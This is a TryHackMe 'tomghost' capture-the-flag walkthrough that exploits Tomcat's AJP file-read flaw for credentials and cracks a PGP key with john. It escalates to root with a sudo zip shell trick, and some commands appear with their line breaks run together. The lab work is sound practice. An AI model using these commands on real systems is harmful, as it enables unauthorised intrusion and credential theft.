TryHackMe: tomghost

ratiros01
4 min readJul 13, 2020

--

[Enumeration]

  1. Port scan
nmap -Pn <ip>

2. OS and service scan

nmap -A -p 22,53,8009,8080 <ip>

This machine has Ubuntu linux, Apache Jserv, and Apache Tomcat 9.0.30.

3. Vulnerable scan

nmap --script vuln <ip>

4. Access HTTP site on port 8080

Click Manager App. If I’m lucky enough, I can access it and upload reverse shell.

Failed!!! 403 Access Denied!!! I have to find another way.

[Exploitation]

  1. Search for exploitation
searchsploit tomcat 9

Copy it

searchsploit -m 41783

Read it. Seems like I cannot use this exploit because current Tomcat version is 9.0.30

Let’s search in exploit-db with “tomcat”

This one is the newest.

Seems like this cve can do the LFI and read some data in tomcat-ajp.

Download it.

wget https://www.exploit-db.com/download/48143

Run the script

python 48143 <target ip>

Seems like I have a credential.

2. Try to login

ssh skyfuck@<ip>

3. Explore the machine

ls 

There’re 2 files: credential.pgp and tryhackme.asc.

cat /etc/passwd

There’re 3 users: root, merlin, and skyfuck.

Try to login as merlin

su merlin

Failed!!!

Explore merlin’s directory

cd /homelscd merlinlscat user.txt

[Privilege Escalation]

  1. Verify sudo rights
sudo -l

skyfuck can’t run sudo.

2. Verify SUID

Not much useful

3. Verify cronjob

crontab -e

Nothing

Seems like I can’t do much with skyfuck. I have to escalate to merlin.

4. Use filezilla to download files in /home/skyfuck with skyfuck’s credential.

5. Decrypt the file

Since It’s pgp file. I have to research. I came across to this:

gpg2john credential.pgp

Seems like I failed.

gpg2john tryhackme.asc

Success!!!

Save as a file

gpg2john tryhackme.asc > hash

Crack password

john --wordlist=rockyou.txt hashjohn hash --show

Now I have password for pgp file.

Import pgp key and decrypt

gpg --import tryhackme.asc gpg --decrypt credential.pgp

Now I have merlin’s password.

6. Login as merlin

su merlin

Success!!!

7. Verify sudo

sudo -l

8. Escalate to root using zip

Reference:

TF=$(mktemp -u)sudo zip $TF /etc/hosts -T -TT 'sh #'

Now I’m root.

9. Find root.txt

cd /rootlscat root.txt

--

--